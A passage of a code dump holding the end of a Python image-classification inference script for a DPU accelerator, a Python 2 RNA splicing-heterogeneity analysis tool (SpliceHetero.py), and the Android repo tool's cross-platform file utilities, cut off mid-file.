runSize=n_of_images-count
shapeIn = (runSize,) + tuple([inputTensors[0].dims[i] for i in range(inputTensors[0].ndims)][1:])
'''prepare batch input/output '''
outputData = []
inputData = []
outputData.append(np.empty((runSize,outputHeight,outputWidth,outputChannel), dtype = np.float32, order = 'C'))
inputData.append(np.empty((shapeIn), dtype = np.float32, order = 'C'))
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j,...] = img[(count+j)% n_of_images].reshape(inputTensors[0].dims[1],inputTensors[0].dims[2],inputTensors[0].dims[3])
'''run with batch '''
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
for j in range(len(outputData)):
outputData[j] = outputData[j].reshape(runSize, outputSize)
'''store output vectors '''
for j in range(runSize):
out_q[write_index] = outputData[0][j]
write_index += 1
count = count + runSize
def app(image_dir,threads,model):
listimage=os.listdir(image_dir)
runTotal = len(listimage)
global out_q
out_q = [None] * runTotal
all_dpu_runners = []
threadAll = []
for i in range(threads):
all_dpu_runners.append(runner.Runner(model)[0])
''' preprocess images '''
img = []
for i in range(runTotal):
path = os.path.join(image_dir,listimage[i])
img.append(preprocess_fn(path))
'''run threads '''
start=0
for i in range(threads):
if (i==threads-1):
end = len(img)
else:
end = start+(len(img)//threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i,start,all_dpu_runners[i], in_q))
threadAll.append(t1)
start=end
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
timetotal = time2 - time1
fps = float(runTotal / timetotal)
print("FPS=%.2f, total frames = %.0f , time=%.4f seconds" %(fps,runTotal, timetotal))
''' post-processing '''
classes = ['airplane','automobile','bird','cat','deer','dog','frog','horse','ship','truck']
correct = 0
wrong = 0
print('output buffer length:',len(out_q))
for i in range(len(out_q)):
argmax = np.argmax((out_q[i]))
prediction = classes[argmax]
ground_truth, _ = listimage[i].split('_')
if (ground_truth==prediction):
correct += 1
else:
wrong += 1
accuracy = correct/len(out_q)
print('Correct:',correct,'Wrong:',wrong,'Accuracy:', accuracy)
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--image_dir',
type=str,
default='images',
help='Path to folder of images. Default is images')
ap.add_argument('-t', '--threads',
type=int,
default=1,
help='Number of threads. Default is 1')
ap.add_argument('-m', '--model',
type=str,
default='model_dir',
help='Path of folder with .elf & .json. Default is model_dir')
args = ap.parse_args()
print ('Command line options:')
print (' --image_dir : ', args.image_dir)
print (' --threads : ', args.threads)
print (' --model : ', args.model)
app(args.image_dir,args.threads,args.model)
if __name__ == '__main__':
main()
|
SpliceHetero.py
|
import os
import sys
import commands
import numpy as np
import time
import math
import multiprocessing as mp
import itertools
import argparse
import random
from scipy.stats import entropy
import datetime
nn = "\n"
tt = "\t"
ss = "/"
cc = ","
def GET_TIME():
return str(datetime.datetime.now()).split(".")[0]
##End GET_TIME
def main():
#[1]Argument Parsing
print "STEP_1: Argument Parsing... [%s]"%GET_TIME()
ArgumentParser = GenArgumentParser()
#[2]Input Processing
print "STEP_2: Input Processing... [%s]"%GET_TIME()
InputHandler = GenInputHandler(ArgumentParser)
#[3]sITH Calculation
print "STEP_3: sITH Calculation... [%s]"%GET_TIME()
UnitHandler = GenUnitHandler(ArgumentParser, InputHandler)
#[4]
print "Completed [%s]"%GET_TIME()
##End main
class GenArgumentParser(object):
def __init__(self):
#[1]
self.Parser_obj = argparse.ArgumentParser()
self.BuildParser_method()
#[2]
self.Handler_obj = self.Parser_obj.parse_args()
self.CheckHandler_method()
#[3]
self.Out_dir = self.Handler_obj.out_directory_path; makePath(self.Out_dir)
self.ArgumentExport_method()
##End init
def ArgumentExport_method(self):
#[1]
Argument_path = self.Out_dir + ss + "ARGUMENTS.txt"
Argument_file = open(Argument_path, 'w')
COMMAND_line = "CMD: %s"%makeLine(sys.argv, " ")
Argument_file.write(COMMAND_line + nn)
#[2]
ARG_index = 1
for ARG_NAME in sorted(self.Handler_obj.__dict__):
ARG_VALUE = self.Handler_obj.__dict__[ARG_NAME]
ARG_line = "[%s]%s=%s"%(ARG_index, ARG_NAME, ARG_VALUE); ARG_index += 1
Argument_file.write(ARG_line + nn)
##End for
#[3]
Argument_file.close()
##End ArgumentExport_method
def CheckHandler_method(self):
#[1]
self.Message_list = []
#[2]
self.Message_list.append("Usage: python SpliceHetero.py [arguments]")
self.Message_list.append("\nEssemtial Arguments:")
self.Message_list.append("'-csp', '--Case_Sample_path' [PATH]\t\tList of case-sample input (see CANCER_SAMPLES.txt for input format)")
self.Message_list.append("'-rsp', '--Reference_Sample_path' [PATH]\t\tList of reference-sample input (see NORMAL_SAMPLES.txt for input format)")
self.Message_list.append("'-odp', '--Out_Dir_path' [PATH]\t\tDirectory path for output'")
#[3]
self.Message_list.append("\nOptional Arguments:")
self.Message_list.append("'-prn', '--Process_number' [INT]\t\tNumber of processes to use (default: 1)")
self.Message_list.append("'-slb', '--Stranded_Library_bool' [BOOL]\t\tIf it is stranded library (options: True/False, default: False)'")
#[4]
self.Message_line = makeLine(self.Message_list, nn)
self.Essential_list = ["case_sample_path", "reference_sample_path", "out_directory_path"]
for arg_name in self.Essential_list:
if self.Handler_obj.__dict__[arg_name] == None:
sys.exit(self.Message_line)
##End if
##End for
##End CheckHandler_method
def BuildParser_method(self):
#[1]Essential
self.Parser_obj.add_argument('-csp', '--Case_Sample_path', dest="case_sample_path",help = "")
self.Parser_obj.add_argument('-rsp', '--Reference_Sample_path', dest="reference_sample_path",help = "")
self.Parser_obj.add_argument('-odp', '--Out_Dir_path', dest="out_directory_path",help = "")
#[2]Optional
self.Parser_obj.add_argument('-prn', '--Process_number', dest="process_number_int",help = "", default=1)
self.Parser_obj.add_argument('-slb', '--Stranded_Library_bool', dest="Stranded_Library_bool",help = "", default="False")
##End BuildParser_method
##End GenArgumentParser
class GenInputHandler(object):
def __init__(self, ArgumentParser):
#[1]
self.Handler_obj = ArgumentParser.Handler_obj
#[2]
self.SampleRegister_method()
##End init
def SampleRegister_method(self):
#[1]
self.Case_list = []; self.Case_idx = 0
self.Case_path = self.Handler_obj.case_sample_path
for case_line in open(self.Case_path):
if case_line.strip()[0] == "#":
continue
##End if
sample_name, junction_path = case_line.split()[:2]
sampleObj = GenSampleObject()
sampleObj.Name_str = sample_name
sampleObj.Junction_path = junction_path
self.Case_list.append(sampleObj)
##End for
#[2]
self.Ref_list = []; self.Ref_idx = 0
self.Ref_path = self.Handler_obj.reference_sample_path
for ref_line in open(self.Ref_path):
if ref_line.strip()[0] == "#":
continue
##End if
sample_name, junction_path = ref_line.split()[:2]
sampleObj = GenSampleObject()
sampleObj.Name_str = sample_name
sampleObj.Junction_path = junction_path
self.Ref_list.append(sampleObj)
##End for
#[3]
a, b = map(len, [self.Case_list, self.Ref_list])
print " - CASE:%s, REF:%s samples are registered [%s]"%(a, b, GET_TIME())
##End SampleRegister_method
##End GenInputHandler
class GenUnitHandler(object):
def __init__(self, ArgumentParser, InputHandler):
#[1]
self.Handler_obj = ArgumentParser.Handler_obj
self.Ref_list = InputHandler.Ref_list
self.Case_list = InputHandler.Case_list
self.Sample_list = self.Ref_list + self.Case_list
#[2]
self.nProcess_int = int(self.Handler_obj.process_number_int)
self.sLibrary_bool = self.Handler_obj.Stranded_Library_bool.upper() == "TRUE"
self.Out_dir = self.Handler_obj.out_directory_path
self.Unit_dir = self.Out_dir + ss + "tmp"
makePath(self.Out_dir); makePath(self.Unit_dir)
#[3]
self.HashExtract_method()
#[4]
self.UnitGenerate_method()
#[5]
self.UnitExport_method()
#[6]
self.SHD_Export_method()
##End init
def SHD_Export_method(self):
#[1]
self.Normalized_path = self.Out_dir + ss + "sITH_REGIONS.txt"
self.Normalized_file = open(self.Normalized_path, 'r')
self.SampleName_list = self.Normalized_file.readline().split()[4:]
#[2]
self.SHD_dic = {}
for normalized_line in self.Normalized_file:
sample_distance_list = map(float, normalized_line.split()[4:])
for sample_index, sample_distance in zip(range(len(self.SampleName_list)), sample_distance_list):
if sample_index not in self.SHD_dic:
self.SHD_dic[sample_index] = []
##End if
self.SHD_dic[sample_index].append(sample_distance)
##End for
##End for
#[3]
self.SHD_path = self.Out_dir + ss + "sITH.txt"
self.SHD_file = open(self.SHD_path, 'w')
head_line = makeLine(["Sample", "sITH"], tt)
self.SHD_file.write(head_line + nn)
#[4]
for sample_index in sorted(self.SHD_dic):
sample_name = self.SampleName_list[sample_index]
SHD_list = filter(lambda x:not math.isnan(x), self.SHD_dic[sample_index])
if SHD_list:
SHD_AVG = np.mean(SHD_list)
else:
SHD_AVG = float("nan")
##End if-else
SHD_line = makeLine([sample_name, SHD_AVG], tt)
self.SHD_file.write(SHD_line + nn)
##End for
#[5]
self.SHD_file.close()
#[6]
commands.getoutput("rm -r %s"%self.Unit_dir)
##End SHD_Export_method
def UnitExport_method(self):
#[1]
self.Count_path = self.Out_dir + ss + "COUNT.txt"
self.Distance_path = self.Out_dir + ss + "sITH_REGIONS.txt"
#[2]
self.Count_file = open(self.Count_path, 'w')
self.Distance_file = open(self.Distance_path, 'w')
#[3]
self.Hash_list = []; self.Hash_index = 0
self.Hash_path = self.Unit_dir + ss + "HashList.txt"
for hash_line in open(self.Hash_path):
chr_name, hash_size = hash_line.split()
hashObj = GenHashObject(); hashObj.Chr_name = chr_name
hashObj.Job_name = "Hash.%s"%self.Hash_index; self.Hash_index += 1
hashObj.Size_int = int(hash_size)
self.Hash_list.append(hashObj)
##End for
#[4]
self.Hash_index = 0
for jobObj in sorted(self.Hash_list, key=lambda x:x.Size_int, reverse=True):
jobObj.Index_int = self.Hash_index; self.Hash_index += 1
jobObj.Count_path = self.Unit_dir + ss + "%s.COUNT_REGIONS.txt"%jobObj.Job_name
jobObj.Distance_path = self.Unit_dir + ss + "%s.sITH_REGIONS.txt"%jobObj.Job_name
self.JobExport_method(jobObj)
##End for
#[5]
self.Count_file.close()
self.Distance_file.close()
##End UnitExport_method
def JobExport_method(self, jobObj):
#[1]
jobObj.Count_file = open(jobObj.Count_path, 'r')
jobObj.Distance_file = open(jobObj.Distance_path, 'r')
#[2]
if jobObj.Index_int == 0:
self.Count_file.write(jobObj.Count_file.readline())
self.Distance_file.write(jobObj.Distance_file.readline())
head_line = makeLine(["Chromosome", "Shared_site[1-based]", "Fixed_sites[1-based]"], tt)
else:
jobObj.Count_file.readline()
jobObj.Distance_file.readline()
##End if
#[3]
self.Count_file.write(jobObj.Count_file.read())
self.Distance_file.write(jobObj.Distance_file.read())
#[4]
jobObj.Count_file.close()
jobObj.Distance_file.close()
##End JobExport_method
def UnitGenerate_method(self):
#[1]
self.Process_list = []
self.Semaphore_obj = mp.Semaphore(self.nProcess_int)
self.Hash_path = self.Unit_dir + ss + "HashList.txt"
self.Hash_line_list = open(self.Hash_path).readlines()
self.Hash_index_list = range(len(self.Hash_line_list))
self.HASH_flag_list = map(lambda x:int(np.percentile(self.Hash_index_list,x)), range(0,101,10))
#[2]
self.Hash_index = 0
for hash_line in open(self.Hash_path):
chr_name, hash_size = hash_line.split()
jobObj = GenHashObject(); jobObj.Chr_name = chr_name
jobObj.Job_name = "Hash.%s"%self.Hash_index; self.Hash_index += 1
self.Semaphore_obj.acquire(); argVect = tuple([jobObj])
procObj = mp.Process(target=self.JobProcess_method, args=argVect)
procObj.start(); self.Process_list.append(procObj)
if (self.Hash_index-1) in self.HASH_flag_list:
a, b = self.Hash_index, len(self.Hash_line_list)
print " - %s/%s jobs are being processed... [%s]"%(a, b, GET_TIME())
##End if
##End for
#[3]
for procObj in self.Process_list:
procObj.join()
##End for
##End UnitGenerate_method
def JobProcess_method(self, jobObj):
#[1]
self.Chr_name = jobObj.Chr_name
self.Job_name = jobObj.Job_name
#[2]
self.UnitExtract_method()
#[3]
self.CountExtract_method()
#[4]
self.DistanceExtract_method()
#[5]
self.Semaphore_obj.release()
##End JobProcess_method
def DistanceExtract_method(self):
#[1]
self.Count_path = self.Unit_dir + ss + "%s.COUNT_REGIONS.txt"%self.Job_name
self.Count_file = open(self.Count_path, 'r')
self.Count_file.readline()
#[2]
self.Distance_path = self.Unit_dir + ss + "%s.sITH_REGIONS.txt"%self.Job_name
self.Distance_file = open(self.Distance_path, 'w')
self.Name_list = map(lambda x:x.Name_str, self.Case_list)
self.Head_line = makeLine(["Chromosome", "Shared_site[1-based]", "Alternative_sites[1-based]", "Strand"] + self.Name_list, tt)
self.Distance_file.write(self.Head_line + nn)
#[3]
for count_line in self.Count_file:
distance_line = self.Get_DistanceLine_method(count_line)
self.Distance_file.write(distance_line + nn)
##End for
#[4]
self.Distance_file.close()
##End DistanceExtract_method
def Get_DistanceLine_method(self, count_line):
#[1]
chr_name, shared_site, alternative_sites, strand = count_line.split()[:4]
count_line_list = count_line.split()[4:]
count_vector_list = map(lambda x:map(float,x.split(cc)), count_line_list)
#[2]
profile_vector_list = []
for count_vector in count_vector_list:
#[2-1]
count_sum = float(sum(count_vector))
if count_sum == 0:
profile_vector = [float("nan")] * len(count_vector)
else:
profile_vector = self.Get_ProfileVector_method(count_vector)
##End if-else
#[2-2]
profile_vector_list.append(profile_vector)
##End for
#[3]
avg_case_distance_dic = {}
avg_case_distance_list = []
for caseObj in self.Case_list:
#[3-1]
case_idx = caseObj.Index_int
case_profile = profile_vector_list[case_idx]
case_distance_list = []
#[3-2]
case_profile_key = tuple(case_profile)
if case_profile_key in avg_case_distance_dic:
avg_case_distance = avg_case_distance_dic[case_profile_key]
avg_case_distance_list.append(avg_case_distance); continue
##End if
#[3-3]
case_ref_distance_dic = {}
for refObj in self.Ref_list:
#[3-3-1]
ref_idx = refObj.Index_int
ref_profile = profile_vector_list[ref_idx]
#[3-3-2]
ref_profile_key = tuple(ref_profile)
if ref_profile_key in case_ref_distance_dic:
case_distance = case_ref_distance_dic[ref_profile_key]
case_distance_list.append(case_distance); continue
##End if
#[3-3-3]
case_distance = self.GetDistance_method(ref_profile, case_profile)
case_distance_list.append(case_distance)
case_ref_distance_dic[ref_profile_key] = case_distance
##End for
#[3-4]
case_distance_list = filter(lambda x:not math.isnan(x), case_distance_list)
if case_distance_list:
avg_case_distance = np.mean(case_distance_list)
else:
avg_case_distance = float("nan")
##End if-else
#[3-5]
avg_case_distance_list.append(avg_case_distance)
avg_case_distance_dic[case_profile_key] = avg_case_distance
##End for
#[4]
distance_line = makeLine([chr_name, shared_site, alternative_sites, strand] + avg_case_distance_list, tt)
return distance_line
##End Get_ProfileLine_method
def Get_ProfileVector_method(self, count_vector):
#[1]
count_sum = sum(count_vector); pseudo_count = count_sum/100.
adjusted_count_vector = map(lambda x:x+pseudo_count, count_vector)
adjusted_count_sum = sum(adjusted_count_vector)
#[2]
adjusted_profile_vector = map(lambda x:x/adjusted_count_sum, adjusted_count_vector)
return adjusted_profile_vector
##End Get_ProfileVector_method
def GetDistance_method(self, profile_A, profile_B):
#[1]
if profile_A == profile_B:
return 0.
##End if
#[2]
profile_M = map(lambda x:(x[0]+x[1])/2, zip(profile_A, profile_B))
#[3]
profile_M_sum = sum(profile_M)
if math.isnan(profile_M_sum):
return float("nan")
##End if
#[4]
distance_A = entropy(profile_A, profile_M, base=2)
distance_B = entropy(profile_B, profile_M, base=2)
#[5]
return (distance_A + distance_B)/2
##End GetDistance_method
def CountExtract_method(self):
#[1]
self.CountRegister_method()
#[2]
self.CountExport_method()
##End CountExtract_method
def CountExport_method(self):
#[1]
self.Count_path = self.Unit_dir + ss + "%s.COUNT_REGIONS.txt"%self.Job_name
self.Count_file = open(self.Count_path, 'w')
self.Name_list = map(lambda x:x.Name_str, self.Sample_list)
self.Head_line = makeLine(["Chromosome", "Shared_site[1-based]", "Alternative_sites[1-based]", "Strand"] + self.Name_list, tt)
self.Count_file.write(self.Head_line + nn)
#[2]
case_name_set = set(map(lambda x:x.Name_str, self.Case_list))
ref_name_set = set(map(lambda x:x.Name_str, self.Ref_list))
for unitObj in sorted(self.Unit_list, key=lambda x:x.Fixed_site):
#[2-1]
sample_index_list = sorted(unitObj.Count_dic.keys())
sample_name_set = set(map(lambda x:self.Sample_list[x].Name_str, sample_index_list))
#[2-2]
if not (sample_name_set & case_name_set):
continue
##End if
if not (sample_name_set & ref_name_set):
continue
##End if
#[2-3]
unitObj.Var_sites = sorted(unitObj.Var_sites)
count_line_list = []
for sampleObj in self.Sample_list:
var_count_list = []
for var_site in unitObj.Var_sites:
try: var_count = unitObj.Count_dic[sampleObj.Index_int][var_site]
except: var_count = 0
var_count_list.append(var_count)
##End for
var_count_line = makeLine(var_count_list, cc)
count_line_list.append(var_count_line)
##End for
#[2-4]
var_sites_line = makeLine(map(lambda x:x[0], unitObj.Var_sites), cc)
unit_count_line = makeLine([unitObj.Chr_name, unitObj.Fixed_site[0], var_sites_line, unitObj.Strand_str] + count_line_list, tt)
self.Count_file.write(unit_count_line + nn)
##End for
#[3]
self.Count_file.close()
##End CountExport_method
def CountRegister_method(self):
for raw_line in open(self.Raw_path):
#[1]
chr_name, junc_st, junc_ed, junc_str, sample_idx, junc_cnt = raw_line.split()
junc_st, junc_ed, sample_idx = map(int, [junc_st, junc_ed, sample_idx])
junc_cnt = float(junc_cnt)
#[2]
junc_st_key = int(junc_st), junc_str; junc_ed_key = int(junc_ed), junc_str
#[3]
if junc_st_key in self.Unit_dic:
unitObj = self.Unit_dic[junc_st_key]
if sample_idx not in unitObj.Count_dic:
unitObj.Count_dic[sample_idx] = {}
##End if
unitObj.Count_dic[sample_idx][junc_ed_key] = junc_cnt
##End if
#[4]
if junc_ed_key in self.Unit_dic:
unitObj = self.Unit_dic[junc_ed_key]
if sample_idx not in unitObj.Count_dic:
unitObj.Count_dic[sample_idx] = {}
##End if
unitObj.Count_dic[sample_idx][junc_st_key] = junc_cnt
##End if
##End fo
##End CountRegister_method
def UnitExtract_method(self):
#[1]
self.Left_dic = {}; self.Right_dic = {}
#[2]
self.Raw_path = self.Unit_dir + ss + "%s.RAW.txt"%self.Job_name
self.Raw_file = open(self.Raw_path,'w'); self.Sample_idx = 0
for sampleObj in self.Sample_list:
sampleObj.Index_int = self.Sample_idx; self.Sample_idx += 1
self.SampleProcess_method(sampleObj)
##End for
#[3]
self.Raw_file.close()
self.Left_list = filter(lambda x:len(x.Var_sites)>=2, self.Left_dic.values())
self.Right_list = filter(lambda x:len(x.Var_sites)>=2, self.Right_dic.values())
self.Unit_list = self.Left_list + self.Right_list
#[4]
self.Unit_dic = {}
for unitObj in self.Unit_list:
self.Unit_dic[unitObj.Fixed_site] = unitObj
##End for
##End UnitExtract_method
def SampleProcess_method(self, sampleObj):
for bed_line in open(sampleObj.Junction_path):
#[1]
chr_name, bed_st, bed_ed, x, junc_cnt, junc_str = bed_line.split()
junc_st = int(bed_st)+1; junc_ed = int(bed_ed); junc_cnt = float(junc_cnt)
if not self.sLibrary_bool:
junc_str = "_"
##End if
if chr_name != self.Chr_name:
continue
##End if
if junc_cnt == 0:
continue
##End if
#[2]
junc_st_key = junc_st, junc_str
junc_ed_key = junc_ed, junc_str
#[3]
if junc_st_key not in self.Left_dic:
unitObj = GenUnitObject()
unitObj.Chr_name = chr_name
unitObj.Fixed_site = junc_st_key
unitObj.Var_sites = set([])
unitObj.Strand_str = junc_str
unitObj.Count_dic = {}
self.Left_dic[junc_st_key] = unitObj
##End if
unitObj = self.Left_dic[junc_st_key]
unitObj.Var_sites.add(junc_ed_key)
#[4]
if junc_ed_key not in self.Right_dic:
unitObj = GenUnitObject()
unitObj.Chr_name = chr_name
unitObj.Fixed_site = junc_ed_key
unitObj.Var_sites = set([])
unitObj.Strand_str = junc_str
unitObj.Count_dic = {}
self.Right_dic[junc_ed_key] = unitObj
##End if
unitObj = self.Right_dic[junc_ed_key]
unitObj.Var_sites.add(junc_ed_key)
#[5]
raw_line = makeLine([chr_name, junc_st, junc_ed, junc_str, sampleObj.Index_int, junc_cnt], tt)
self.Raw_file.write(raw_line + nn)
##End for
##End SampleProcess_method
def HashExtract_method(self):
#[1]
self.Sample_list = self.Case_list + self.Ref_list
#[2]
random.seed(0)
self.Random_cases = random.sample(self.Case_list, min(len(self.Case_list), 3))
self.Random_refs = random.sample(self.Ref_list, min(len(self.Ref_list), 3))
self.Random_list = self.Random_cases + self.Random_refs
#[2]
self.Hash_dic = {}
for sampleObj in self.Random_list:
self.Get_SampleHash_method(sampleObj)
##End for
#[3]
for hashObj in self.Hash_dic.values():
hashObj.Size_int = hashObj.Range_list[1]-hashObj.Range_list[0]
##End for
#[4]
self.Hash_path = self.Unit_dir + ss + "HashList.txt"
self.Hash_file = open(self.Hash_path, 'w')
for hashObj in sorted(self.Hash_dic.values(), key=lambda x:x.Size_int):
hash_line = makeLine([hashObj.Chr_name, hashObj.Size_int], tt)
self.Hash_file.write(hash_line + nn)
##End for
#[5]
self.Hash_file.close()
##End HashExtract_method
def Get_SampleHash_method(self, sampleObj):
for bed_line in open(sampleObj.Junction_path):
chr_name, bed_st, bed_ed, x, x, junc_str = bed_line.split()[:6]
if chr_name not in self.Hash_dic:
hashObj = GenHashObject(); hashObj.Chr_name = chr_name
hashObj.Reference_bit = False
hashObj.Range_list = [float("inf"), -float("inf")]
self.Hash_dic[chr_name] = hashObj
##End if
hashObj = self.Hash_dic[chr_name]
if sampleObj in self.Ref_list:
hashObj.Reference_bit = True
##End if
hashObj.Range_list[0] = min(hashObj.Range_list[0], int(bed_st))
hashObj.Range_list[1] = max(hashObj.Range_list[1], int(bed_ed))
##End for
##End Get_SampleHash_method
##End GenUnitHandler
class GenSampleObject(object):
def __init__(self):
pass
##End init
##End GenSampleObject
class GenCommObject(object):
def __init__(self):
pass
##End init
##End GenSampleObject
class GenHashObject(object):
def __init__(self):
pass
##End init
##End GenHashObject
class GenUnitObject(object):
def __init__(self):
pass
##End init
##End GenUnitObject
def makePath(dirPath):
return commands.getoutput("mkdir %s"%dirPath)
##End makePath
def makeLine(tokenList, sepToken):
return sepToken.join(map(str, tokenList))
##End makeLine
if __name__ == "__main__" :
main()
sys.exit()
##End if
|
platform_utils.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import os
import platform
import select
import shutil
import stat
from pyversion import is_python3
if is_python3():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
def isWindows():
""" Returns True when running with the native port of Python for Windows,
False when running on any other platform (including the Cygwin port of
Python).
"""
# Note: The cygwin port of Python returns "CYGWIN_NT_xxx"
return platform.system() == "Windows"
class FileDescriptorStreams(object):
""" Platform agnostic abstraction enabling non-blocking I/O over a
collection of file descriptors. This abstraction is required because
fctnl(os.O_NONBLOCK) is not supported on Windows.
"""
@classmethod
def create(cls):
""" Factory method: instantiates the concrete class according to the
current platform.
"""
if isWindows():
return _FileDescriptorStreamsThreads()
else:
return _FileDescriptorStreamsNonBlocking()
def __init__(self):
self.streams = []
def add(self, fd, dest, std_name):
""" Wraps an existing file descriptor as a stream.
"""
self.streams.append(self._create_stream(fd, dest, std_name))
def remove(self, stream):
""" Removes a stream, when done with it.
"""
self.streams.remove(stream)
@property
def is_done(self):
""" Returns True when all streams have been processed.
"""
return len(self.streams) == 0
def select(self):
""" Returns the set of streams that have data available to read.
The returned streams each expose a read() and a close() method.
When done with a stream, call the remove(stream) method.
"""
raise NotImplementedError
def _create_stream(fd, dest, std_name):
""" Creates a new stream wrapping an existing file descriptor.
"""
raise NotImplementedError
class _FileDescriptorStreamsNonBlocking(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that support
non blocking I/O.
"""
def __init__(self):
super(_FileDescriptorStreamsNonBlocking, self).__init__()
self._poll = select.poll()
self._fd_to_stream = {}
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.set_non_blocking()
def set_non_blocking(self):
import fcntl
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self):
return self.fd.read(4096)
def close(self):
self.fd.close()
def _create_stream(self, fd, dest, std_name):
stream = self.Stream(fd, dest, std_name)
self._fd_to_stream[stream.fileno()] = stream
self._poll.register(stream, select.POLLIN)
return stream
def remove(self, stream):
self._poll.unregister(stream)
del self._fd_to_stream[stream.fileno()]
super(_FileDescriptorStreamsNonBlocking, self).remove(stream)
def select(self):
return [self._fd_to_stream[fd] for fd, _ in self._poll.poll()]
class _FileDescriptorStreamsThreads(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that don't support
non blocking I/O. This implementation requires creating threads issuing
blocking read operations on file descriptors.
"""
def __init__(self):
super(_FileDescriptorStreamsThreads, self).__init__()
# The queue is shared accross all threads so we can simulate the
# behavior of the select() function
self.queue = Queue(10) # Limit incoming data from streams
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name, self.queue)
def select(self):
# Return only one stream at a time, as it is the most straighforward
# thing to do and it is compatible with the select() function.
item = self.queue.get()
stream = item.stream
stream.data = item.data
return [stream]
class QueueItem(object):
""" Item put in the shared queue """
def __init__(self, stream, data):
self.stream = stream
self.data = data
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name, queue):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.queue = queue
self.data = None
self.thread = Thread(target=self.read_to_queue)
self.thread.daemon = True
self.thread.start()
def close(self):
self.fd.close()
def read(self):
data = self.data
self.data = None
return data
def read_to_queue(self):
""" The thread function: reads everything from the file descriptor into
the shared queue and terminates when reaching EOF.
"""
for line in iter(self.fd.readline, b''):
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, line))
self.fd.close()
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, None))
def symlink(source, link_name):
"""Creates a symbolic link pointing to source named link_name.
Note: On Windows, source must exist on disk, as the implementation needs
to know whether to create a "File" or a "Directory" symbolic link.
"""
if isWindows():
import platform_utils_win32
source = _validate_winpath(source)
link_name = _validate_winpath(link_name)
target = os.path.join(os.path.dirname(link_name), source)
if isdir(target):
platform_utils_win32.create_dirsymlink(_makelongpath(source), link_name)
else:
platform_utils_win32.create_filesymlink(_makelongpath(source), link_name)
else:
return os.symlink(source, link_name)
def _validate_winpath(path):
path = os.path.normpath(path)
if _winpath_is_valid(path):
return path
raise ValueError("Path \"%s\" must be a relative path or an absolute "
"path starting with a drive letter".format(path))
def _winpath_is_valid(path):
"""Windows only: returns True if path is relative (e.g. ".\\foo") or is
absolute including a drive letter (e.g. "c:\\foo"). Returns False if path
is ambiguous (e.g. "x:foo" or "\\foo").
"""
assert isWindows()
path = os.path.normpath(path)
drive, tail = os.path.splitdrive(path)
if tail:
if not drive:
return tail[0] != os.sep # "\\foo" is invalid
else:
return tail[0] == os.sep # "x:foo" is invalid
else:
return not drive # "x:" is invalid
def _makelongpath(path):
"""Return the input path normalized to support the Windows long path syntax
("\\\\?\\" prefix) if needed, i.e. if the input path is longer than the
MAX_PATH limit.
"""
if isWindows():
# Note: MAX_PATH is 260, but, for directories, the maximum value is actually 246.
if len(path) < 246:
return path
if path.startswith(u"\\\\?\\"):
return path
if not os.path.isabs(path):
return path
# Append prefix and ensure unicode so that the special longpath syntax
# is supported by underlying Win32 API calls
return u"\\\\?\\" + os.path.normpath(path)
else:
return path
def rmtree(path, ignore_errors=False):
"""shutil.rmtree(path) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
onerror = None
if isWindows():
path = _makelongpath(path)
onerror = handle_rmtree_error
shutil.rmtree(path, ignore_errors=ignore_errors, onerror=onerror)
def handle_rmtree_error(function, path, excinfo):
# Allow deleting read-only files
os.chmod(path, stat.S_IWRITE)
function(path)
def rename(src, dst):
"""os.rename(src, dst) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
# On Windows, rename fails if destination exists, see
# https://docs.python.org/2/library/os.html#os.rename
try:
os.rename(_makelongpath(src), _makelongpath(dst))
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(_makelongpath(dst))
os.rename(_makelongpath(src), _makelongpath(dst))
else:
raise
else:
os.rename(src, dst)
def remove(path):
"""Remove (delete) the file path. This is a replacement for os.remove that
allows deleting read-only files on Windows, with support for long paths and
for deleting directory symbolic links.
Availability: Unix, Windows."""
if isWindows():
longpath = _makelongpath(path)
try:
os.remove(longpath)
except OSError as e:
if e.errno == errno.EACCES:
os.chmod(longpath, stat.S_IWRITE)
# Directory symbolic links must be deleted with 'rmdir'.
if islink(longpath) and isdir(longpath):
os.rmdir(longpath)
else:
os.remove(longpath)
else:
raise
else:
os.remove(path)
def walk(top, topdown=True, onerror=None, followlinks=False):
"""os.walk(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
return _walk_windows_impl(top, topdown, onerror, followlinks)
else:
return os.walk(top, topdown, onerror, followlinks)
def _walk_windows_impl(top, topdown, onerror, followlinks):
try:
names = listdir(top)
except Exception as err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(os.path.join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
if followlinks or not islink(new_path):
for x in _walk_windows_impl(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def listdir(path):
